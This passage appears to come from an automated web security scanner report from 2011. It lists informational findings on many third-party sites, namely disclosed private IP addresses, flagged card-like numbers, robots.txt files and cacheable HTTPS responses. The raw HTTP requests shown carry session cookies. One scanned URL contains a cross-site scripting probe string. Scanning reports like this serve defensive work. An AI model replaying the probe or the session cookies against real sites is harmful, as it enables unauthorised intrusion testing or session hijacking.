Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.pctools.com
Path:	/registry-mechanic/

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.0.0.134

Request

GET /registry-mechanic/ HTTP/1.1
Host: www.pctools.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

22.24. http://www.robtex.com/as/as15169.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.robtex.com
Path:	/as/as15169.html

Issue detail

The following RFC 1918 IP addresses were disclosed in the response:

10.0.0.0
172.16.0.0
192.168.0.0

Request

Response

22.25. http://www.scmagazineus.com/search/xss/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.scmagazineus.com
Path:	/search/xss/

Issue detail

The following RFC 1918 IP address was disclosed in the response:

192.168.10.149

Request

GET /search/xss/ HTTP/1.1
Host: www.scmagazineus.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

23. Credit card numbers disclosed previous next
There are 5 instances of this issue:

https://ads.pof.com/assets/pdf/POF-HelpDoc.pdf
http://maps.google.com/maps
http://www.bing.com/travel/content/search
http://www.ehow.com/how_2113353_end-sibling-feuds.html
http://www.robtex.com/as/as36623.html

Issue background

Responses containing credit card numbers may not represent any security vulnerability - for example, a number may belong to the logged-in user to whom it is displayed. You should verify whether the numbers identified are actually valid credit card numbers and whether their disclosure within the application is appropriate.

23.1. https://ads.pof.com/assets/pdf/POF-HelpDoc.pdf previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://ads.pof.com
Path:	/assets/pdf/POF-HelpDoc.pdf

Issue detail

The following credit card number was disclosed in the response:

5280000000000000

Request

GET /assets/pdf/POF-HelpDoc.pdf HTTP/1.1
Host: ads.pof.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ASP.NET_SessionId=pf1zsia2vewc4vhyyu3ymws5;

Response

HTTP/1.1 200 OK
Content-Type: application/pdf
Last-Modified: Tue, 23 Mar 2010 22:05:21 GMT
Accept-Ranges: bytes
ETag: "10762eeed4caca1:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Sat, 05 Feb 2011 14:33:08 GMT
Connection: close
Content-Length: 2700375

%PDF-1.4%....
31 0 obj<</Linearized 1/L 2700375/O 33/E 1422234/N 6/T 2699635/H [ 976 340]>>endobj
xref
31 34
0000000016 00000 n
0000001316 00000 n
0000001415 00000 n
0000001868
...[SNIP]...
ntDescriptor 39 0 R/LastChar 173/Subtype/Type1/ToUnicode 40 0 R/Type/Font/Widths[656 555 548 586 274 511 331 285 555 555 555 523 275 519 555 555 314 555 202 528 367 540 860 451 341 577 598 260 434 596 528 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 759 770 260 717 581 717 682 534 690
...[SNIP]...

23.2. http://maps.google.com/maps previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://maps.google.com
Path:	/maps

Issue detail

The following credit card number was disclosed in the response:

5752898454666138

Request

Response

23.3. http://www.bing.com/travel/content/search previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bing.com
Path:	/travel/content/search

Issue detail

The following credit card number was disclosed in the response:

4885830404539621

Request

Response

23.4. http://www.ehow.com/how_2113353_end-sibling-feuds.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ehow.com
Path:	/how_2113353_end-sibling-feuds.html

Issue detail

The following credit card number was disclosed in the response:

5782534426908258

Request

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:15:32 GMT
Server: Microsoft-IIS/6.0
ETag:
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 86982

<!DOCTYPE html>
<html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/">
<head>
       <title>How to End Sibling Feuds | eHow.com</title>
       <m
...[SNIP]...
"http://ad.doubleclick.net/adj/dmd.ehow/parenting;cat=parenting;scat=generalparenting;sscat=parentingadvice;art=2113353;qg=;tc=;vid=0;ctype=articles;ugc=0;lvl=4%QC%;%RSI%tile=1;dcopt=ist;sz=249x77;ord=5782534426908258?" width="249" height="77" marginwidth="0" marginheight="0" frameborder="0" scrolling="no">
...[SNIP]...
http://ad.doubleclick.net/jump/dmd.ehow/parenting;cat=parenting;scat=generalparenting;sscat=parentingadvice;art=2113353;qg=;tc=;vid=0;ctype=articles;ugc=0;lvl=4%QC%;%RSI%tile=1;dcopt=ist;sz=249x77;ord=5782534426908258?" target="_blank">
...[SNIP]...
="http://ad.doubleclick.net/ad/dmd.ehow/parenting;cat=parenting;scat=generalparenting;sscat=parentingadvice;art=2113353;qg=;tc=;vid=0;ctype=articles;ugc=0;lvl=4%QC%;%RSI%tile=1;dcopt=ist;sz=249x77;ord=5782534426908258?" width="249"
           height="77" border="0" alt="" />
...[SNIP]...
ript" src="http://ad.doubleclick.net/adj/dmd.ehow/parenting;cat=parenting;scat=generalparenting;sscat=parentingadvice;art=2113353;qg=;tc=;vid=0;ctype=articles;ugc=0;lvl=4%QC%;%RSI%tile=2;sz=990x90;ord=5782534426908258?" width="990" height="90" marginwidth="0" marginheight="0" frameborder="0" scrolling="no">
...[SNIP]...
<a href="http://ad.doubleclick.net/jump/dmd.ehow/parenting;cat=parenting;scat=generalparenting;sscat=parentingadvice;art=2113353;qg=;tc=;vid=0;ctype=articles;ugc=0;lvl=4%QC%;%RSI%tile=2;sz=990x90;ord=5782534426908258?" target="_blank">
...[SNIP]...
<img src="http://ad.doubleclick.net/ad/dmd.ehow/parenting;cat=parenting;scat=generalparenting;sscat=parentingadvice;art=2113353;qg=;tc=;vid=0;ctype=articles;ugc=0;lvl=4%QC%;%RSI%tile=2;sz=990x90;ord=5782534426908258?" width="990"
           height="90" border="0" alt="" />
...[SNIP]...
rame src="http://ad.doubleclick.net/adi/dmd.ehow/parenting;cat=parenting;scat=generalparenting;sscat=parentingadvice;art=2113353;qg=;tc=;vid=0;ctype=articles;ugc=0;lvl=4%QC%;%RSI%tile=3;sz=300x250;ord=5782534426908258?" width="300" height="250" marginwidth="0" marginheight="0" frameborder="0" scrolling="no">
...[SNIP]...
<a href="http://ad.doubleclick.net/jump/dmd.ehow/parenting;cat=parenting;scat=generalparenting;sscat=parentingadvice;art=2113353;qg=;tc=;vid=0;ctype=articles;ugc=0;lvl=4%QC%;%RSI%tile=3;sz=300x250;ord=5782534426908258?" target="_blank">
...[SNIP]...
<img src="http://ad.doubleclick.net/ad/dmd.ehow/parenting;cat=parenting;scat=generalparenting;sscat=parentingadvice;art=2113353;qg=;tc=;vid=0;ctype=articles;ugc=0;lvl=4%QC%;%RSI%tile=3;sz=300x250;ord=5782534426908258?" width="300"
           height="250" border="0" alt="" />
...[SNIP]...
rame src="http://ad.doubleclick.net/adi/dmd.ehow/parenting;cat=parenting;scat=generalparenting;sscat=parentingadvice;art=2113353;qg=;tc=;vid=0;ctype=articles;ugc=0;lvl=4%QC%;%RSI%tile=4;sz=300x310;ord=5782534426908258?" width="300" height="310" marginwidth="0" marginheight="0" frameborder="0" scrolling="no">
...[SNIP]...
<a href="http://ad.doubleclick.net/jump/dmd.ehow/parenting;cat=parenting;scat=generalparenting;sscat=parentingadvice;art=2113353;qg=;tc=;vid=0;ctype=articles;ugc=0;lvl=4%QC%;%RSI%tile=4;sz=300x310;ord=5782534426908258?" target="_blank">
...[SNIP]...
<img src="http://ad.doubleclick.net/ad/dmd.ehow/parenting;cat=parenting;scat=generalparenting;sscat=parentingadvice;art=2113353;qg=;tc=;vid=0;ctype=articles;ugc=0;lvl=4%QC%;%RSI%tile=4;sz=300x310;ord=5782534426908258?" width="300"
           height="310" border="0" alt="" />
...[SNIP]...

23.5. http://www.robtex.com/as/as36623.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.robtex.com
Path:	/as/as36623.html

Issue detail

The following credit card number was disclosed in the response:

4975415007110

Request

Response

24. Robots.txt file previous next
There are 9 instances of this issue:

http://go.microsoft.com/fwlink/
http://id.google.com/verify/EAAAAIUFIolnpKwmOAKbBVumOsA.gif
http://pixel.facebook.com/ajax/register/logging.php
http://safebrowsing.clients.google.com/safebrowsing/downloads
http://toolbarqueries.clients.google.com/tbproxy/af/query
http://www.astaro.com/newsletter
https://www.astaro.com/design/en/javascript/main.js
http://www.google-analytics.com/siteopt.js
http://www.googleadservices.com/pagead/conversion/1072269077/

Issue background

The file robots.txt is used to give instructions to web robots, such as search engine crawlers, about locations within the web site which robots are allowed, or not allowed, to crawl and index.

The presence of the robots.txt does not in itself present any kind of security vulnerability. However, it is often used to identify restricted or private areas of a site's contents. The information in the file may therefore help an attacker to map out the site's contents, especially if some of the locations identified are not linked from elsewhere in the site. If the application relies on robots.txt to protect access to these areas, and does not enforce proper access control over them, then this presents a serious vulnerability.

Issue remediation

The robots.txt file is not itself a security threat, and its correct use can represent good practice for non-security reasons. You should not assume that all web robots will honour the file's instructions. Rather, assume that attackers will pay close attention to any locations identified in the file. Do not rely on robots.txt to provide any kind of protection over unauthorised access.

24.1. http://go.microsoft.com/fwlink/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://go.microsoft.com
Path:	/fwlink/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: go.microsoft.com

Response

HTTP/1.1 200 OK
Content-Type: text/plain
Last-Modified: Thu, 27 Oct 2005 18:42:43 GMT
Accept-Ranges: bytes
ETag: "a03b9f3726dbc51:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Tue, 01 Feb 2011 01:33:57 GMT
Connection: keep-alive
Content-Length: 80

# Robots.txt file for http://go.microsoft.com
#

User-agent: *
Disallow: /

24.2. http://id.google.com/verify/EAAAAIUFIolnpKwmOAKbBVumOsA.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://id.google.com
Path:	/verify/EAAAAIUFIolnpKwmOAKbBVumOsA.gif

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: id.google.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Date: Sat, 05 Feb 2011 14:21:22 GMT
Server: zwbk
Cache-Control: private, x-gzip-ok=""
X-XSS-Protection: 1; mode=block

User-Agent: *
Disallow: /
Noindex: /

24.3. http://pixel.facebook.com/ajax/register/logging.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pixel.facebook.com
Path:	/ajax/register/logging.php

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: pixel.facebook.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain;charset=utf-8
Connection: close
Content-Length: 2553

# Notice: if you would like to crawl Facebook you can
# contact us here: http://www.facebook.com/apps/site_scraping_tos.php
# to apply for white listing. Our general terms are available
# at http://ww
...[SNIP]...

24.4. http://safebrowsing.clients.google.com/safebrowsing/downloads previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://safebrowsing.clients.google.com
Path:	/safebrowsing/downloads

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: safebrowsing.clients.google.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Last-Modified: Mon, 17 Jan 2011 07:39:39 GMT
Date: Tue, 01 Feb 2011 02:33:20 GMT
Expires: Tue, 01 Feb 2011 02:33:20 GMT
Cache-Control: private, max-age=0
Vary: Accept-Encoding
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block

User-agent: *
Disallow: /search
Disallow: /groups
Disallow: /images
Disallow: /catalogs
Disallow: /catalogues
Disallow: /news
Allow: /news/directory
Disallow: /nwshp
Disallow: /setnewsprefs?
Disallow:
...[SNIP]...

24.5. http://toolbarqueries.clients.google.com/tbproxy/af/query previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://toolbarqueries.clients.google.com
Path:	/tbproxy/af/query

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: toolbarqueries.clients.google.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Last-Modified: Mon, 17 Jan 2011 07:39:39 GMT
Date: Tue, 01 Feb 2011 01:30:26 GMT
Expires: Tue, 01 Feb 2011 01:30:26 GMT
Cache-Control: private, max-age=0
Vary: Accept-Encoding
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block

User-agent: *
Disallow: /search
Disallow: /groups
Disallow: /images
Disallow: /catalogs
Disallow: /catalogues
Disallow: /news
Allow: /news/directory
Disallow: /nwshp
Disallow: /setnewsprefs?
Disallow:
...[SNIP]...

24.6. http://www.astaro.com/newsletter previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.astaro.com
Path:	/newsletter

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.astaro.com

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Tue, 12 Jan 2010 10:27:30 GMT
ETag: "19da0d-63b-19e34880"
Vary: Accept-Encoding
Content-Type: text/plain; charset=ISO-8859-1
Content-Length: 1595
Date: Tue, 01 Feb 2011 13:55:46 GMT
X-Varnish: 1753529795 1753528724
Age: 101
Via: 1.1 varnish
Connection: close

# $Id: robots.txt,v 1.1.1.1 2010/01/12 10:27:30 mkindtner Exp $
#
# robots.txt
#
# This file is to prevent the crawling and indexing of certain parts
# of your site by web crawlers and spiders run by
...[SNIP]...

24.7. https://www.astaro.com/design/en/javascript/main.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.astaro.com
Path:	/design/en/javascript/main.js

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.astaro.com

Response

HTTP/1.1 200 OK
Date: Tue, 01 Feb 2011 13:56:43 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Tue, 12 Jan 2010 10:27:30 GMT
ETag: "19da0d-63b-19e34880"
Accept-Ranges: bytes
Content-Length: 1595
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain; charset=ISO-8859-1

# $Id: robots.txt,v 1.1.1.1 2010/01/12 10:27:30 mkindtner Exp $
#
# robots.txt
#
# This file is to prevent the crawling and indexing of certain parts
# of your site by web crawlers and spiders run by
...[SNIP]...

24.8. http://www.google-analytics.com/siteopt.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.google-analytics.com
Path:	/siteopt.js

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.google-analytics.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Last-Modified: Mon, 10 Jan 2011 11:53:04 GMT
Date: Tue, 01 Feb 2011 01:30:46 GMT
Expires: Tue, 01 Feb 2011 01:30:46 GMT
Cache-Control: private, max-age=0
Vary: Accept-Encoding
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block

User-agent: *
Disallow: /siteopt.js
Disallow: /config.js

24.9. http://www.googleadservices.com/pagead/conversion/1072269077/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.googleadservices.com
Path:	/pagead/conversion/1072269077/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.googleadservices.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Last-Modified: Mon, 17 Jan 2011 07:39:39 GMT
Date: Tue, 01 Feb 2011 01:30:56 GMT
Expires: Tue, 01 Feb 2011 01:30:56 GMT
Cache-Control: private, max-age=0
Vary: Accept-Encoding
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block

User-agent: *
Disallow: /search
Disallow: /groups
Disallow: /images
Disallow: /catalogs
Disallow: /catalogues
Disallow: /news
Allow: /news/directory
Disallow: /nwshp
Disallow: /setnewsprefs?
Disallow:
...[SNIP]...

25. Cacheable HTTPS response previous next
There are 47 instances of this issue:

https://adadvisor.net/adscores/g.json
https://ads.pof.com/
https://ads.pof.com/Default.aspx
https://ads.pof.com/Default.aspx/%22ns=%22alert(0x000176)
https://ads.pof.com/Default.aspx/assets/png/create_your_first_ad.png
https://ads.pof.com/assets/pdf/POF-HelpDoc.pdf
https://ads.pof.com/ui/Message.aspx
https://ads.pof.com/ui/RetrievePassword.aspx
https://amihackerproof.com/about_us.php
https://fpdownload.macromedia.com/get/flashplayer/current/swflash.cab
https://gc.synxis.com/XBE/Popups/InfoPopup.aspx
https://gc.synxis.com/XBE/ScriptResource.axd
https://gc.synxis.com/XBE/WebResource.axd
https://gc.synxis.com/rez.aspx
https://gc.synxis.com/xbe/Services/XbeService.asmx/CheckForPackages
https://gc.synxis.com/xbe/rez.aspx
https://hostedusa3.whoson.com/chat/chatstart.htm
https://leads.demandbase.com/
https://login.facebook.com/ajax/intl/language_dialog.php
https://maps-api-ssl.google.com/maps
https://maps-api-ssl.google.com/maps/api/js
https://my.omniture.com/login/
https://my.omniture.com/p/suite/1.2/index.html
https://my.omniture.com/p/suite/current/authentication/get_login_domain.html
https://my.omniture.com/password_recovery.html
https://my.omniture.com/support_popup_form.html
https://picasaweb.google.com/lh/view
https://publish.omniture.com/center/
https://publish.omniture.com/center/util/
https://secure.opinionlab.com/ccc01/o.asp
https://sitesearch.omniture.com/center/
https://sitesearch.omniture.com/center/util/
https://trustseal.verisign.com/getseal
https://trustsealinfo.verisign.com/splash
https://twitter.com/jobs
https://twitter.com/oexchange.xrd
https://www.astaro.com/design/en/images/icons/favicon.ico
https://www.ehow.com/account/facebook_merge.aspx
https://www.ehow.com/account/simple_login.aspx
https://www.ehow.com/account/simple_register.aspx
https://www.ehow.com/ajax/loginbyfacebookid.aspx
https://www.ehow.com/forms/
https://www.ehow.com/forms/PasswordRetrieval.aspx
https://www.ehow.com/forms/signin.aspx
https://www.ehow.com/privacy.aspx
https://www.ehow.com/terms_use.aspx
https://www.ehow.com/xd_receiver.htm

Issue description

Unless directed otherwise, browsers may store a local cached copy of content received from web servers. Some browsers, including Internet Explorer, cache content accessed via HTTPS. If sensitive information in application responses is stored in the local cache, then this may be retrieved by other users who have access to the same computer at a future time.

Issue remediation

The application should return caching directives instructing browsers not to store local copies of any sensitive data. Often, this can be achieved by configuring the web server to prevent caching for relevant paths within the web root. Alternatively, most web development platforms allow you to control the server's caching directives from within individual scripts. Ideally, the web server should return the following HTTP headers in all responses containing sensitive content:

Cache-control: no-store
Pragma: no-cache

25.1. https://adadvisor.net/adscores/g.json previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://adadvisor.net
Path:	/adscores/g.json

Request

GET /adscores/g.json?sid=9233633946 HTTP/1.1
Host: adadvisor.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Wed, 02 Feb 2011 16:18:32 GMT
Server: Apache
P3P: policyref="http://adadvisor.net/w3c/p3p.xml",CP="NOI NID"
Content-Length: 94
Connection: close
Content-Type: application/json

Targus.parseInfo({"targus": { "segment": "000", "zip": "{%zip}", "age": "", "gender": "" } });

25.2. https://ads.pof.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://ads.pof.com
Path:	/

Request

Response

25.3. https://ads.pof.com/Default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://ads.pof.com
Path:	/Default.aspx

Request

Response

25.4. https://ads.pof.com/Default.aspx/%22ns=%22alert(0x000176) previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://ads.pof.com
Path:	/Default.aspx/%22ns=%22alert(0x000176)

Request

Response

25.5. https://ads.pof.com/Default.aspx/assets/png/create_your_first_ad.png previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://ads.pof.com
Path:	/Default.aspx/assets/png/create_your_first_ad.png

Request

Response

25.6. https://ads.pof.com/assets/pdf/POF-HelpDoc.pdf previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://ads.pof.com
Path:	/assets/pdf/POF-HelpDoc.pdf

Request

Response

25.7. https://ads.pof.com/ui/Message.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://ads.pof.com
Path:	/ui/Message.aspx

Request

GET /ui/Message.aspx?message_id=2 HTTP/1.1
Host: ads.pof.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ASP.NET_SessionId=pf1zsia2vewc4vhyyu3ymws5;

Response

25.8. https://ads.pof.com/ui/RetrievePassword.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://ads.pof.com
Path:	/ui/RetrievePassword.aspx

Request

GET /ui/RetrievePassword.aspx HTTP/1.1
Host: ads.pof.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ASP.NET_SessionId=pf1zsia2vewc4vhyyu3ymws5;

Response

25.9. https://amihackerproof.com/about_us.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://amihackerproof.com
Path:	/about_us.php

Request

GET /about_us.php HTTP/1.1
Host: amihackerproof.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

25.10. https://fpdownload.macromedia.com/get/flashplayer/current/swflash.cab previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://fpdownload.macromedia.com
Path:	/get/flashplayer/current/swflash.cab

Request

GET /get/flashplayer/current/swflash.cab HTTP/1.1
Host: fpdownload.macromedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

25.11. https://gc.synxis.com/XBE/Popups/InfoPopup.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://gc.synxis.com
Path:	/XBE/Popups/InfoPopup.aspx

Request

GET /XBE/Popups/InfoPopup.aspx HTTP/1.1
Host: gc.synxis.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; ASP.NET_SessionId=jtlir345s4fdq0eiwrrnxp45; mbox=check#true#1296574114|session#1296573995979-796819#1296575914;

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 158
Date: Tue, 01 Feb 2011 15:33:45 GMT
Connection: close

25.12. https://gc.synxis.com/XBE/ScriptResource.axd previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://gc.synxis.com
Path:	/XBE/ScriptResource.axd

Request

GET /XBE/ScriptResource.axd HTTP/1.1
Host: gc.synxis.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; ASP.NET_SessionId=jtlir345s4fdq0eiwrrnxp45; mbox=check#true#1296574114|session#1296573995979-796819#1296575914;

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Date: Tue, 01 Feb 2011 15:33:44 GMT
Content-Length: 951
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>
SynXis Guest Connect
</title>
...[SNIP]...

25.13. https://gc.synxis.com/XBE/WebResource.axd previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://gc.synxis.com
Path:	/XBE/WebResource.axd

Request

GET /XBE/WebResource.axd HTTP/1.1
Host: gc.synxis.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; ASP.NET_SessionId=jtlir345s4fdq0eiwrrnxp45; mbox=check#true#1296574114|session#1296573995979-796819#1296575914;

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Date: Tue, 01 Feb 2011 15:33:44 GMT
Content-Length: 951
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>
SynXis Guest Connect
</title>
...[SNIP]...

25.14. https://gc.synxis.com/rez.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://gc.synxis.com
Path:	/rez.aspx

Request

GET /rez.aspx HTTP/1.1
Host: gc.synxis.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; ASP.NET_SessionId=jtlir345s4fdq0eiwrrnxp45; mbox=check#true#1296574114|session#1296573995979-796819#1296575914;

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Date: Tue, 01 Feb 2011 15:33:51 GMT
Content-Length: 1049
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>
SynXis Guest Connect
</title>
...[SNIP]...

25.15. https://gc.synxis.com/xbe/Services/XbeService.asmx/CheckForPackages previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://gc.synxis.com
Path:	/xbe/Services/XbeService.asmx/CheckForPackages

Request

GET /xbe/Services/XbeService.asmx/CheckForPackages?hotelId=11536&rateCode=%22NGBDE%22&arriveTicks=634321152000000000&departTicks=634322016000000000&confirmNumber=%22%22 HTTP/1.1
Host: gc.synxis.com
Connection: keep-alive
Referer: https://gc.synxis.com/xbe/rez.aspx?Chain=5303&start=1&hotel=11536&arrive=02%2F01%2F2011&nights=1&adult=1&child=0&rooms=1&group=&promo=ushoyt&iata=&step=2&mboxSession=1296573995979-796819
Content-Type: application/json; charset=utf-8
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=jtlir345s4fdq0eiwrrnxp45; mbox=check#true#1296574083|session#1296573995979-796819#1296575883; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private, max-age=0
Content-Type: application/json; charset=utf-8
Content-Length: 11
Date: Tue, 01 Feb 2011 15:26:45 GMT
Connection: keep-alive

{"d":false}

25.16. https://gc.synxis.com/xbe/rez.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://gc.synxis.com
Path:	/xbe/rez.aspx

Request

GET /xbe/rez.aspx?Chain=5303&start=1&hotel=11536&arrive=02%2F01%2F2011&nights=1&adult=1&child=0&rooms=1&group=&promo=ushoyt&iata=&step=2&mboxSession=1296573995979-796819 HTTP/1.1
Host: gc.synxis.com
Connection: keep-alive
Referer: http://www.millenniumhotels.com/millenniumboston/index.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

25.17. https://hostedusa3.whoson.com/chat/chatstart.htm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://hostedusa3.whoson.com
Path:	/chat/chatstart.htm

Request

GET /chat/chatstart.htm HTTP/1.1
Host: hostedusa3.whoson.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html
Last-Modified: Tue, 11 Jan 2011 14:51:30 GMT
Accept-Ranges: bytes
ETag: "085dc79fb1cb1:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Thu, 03 Feb 2011 06:54:15 GMT
Connection: close
Content-Length: 1796

...<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="C
...[SNIP]...

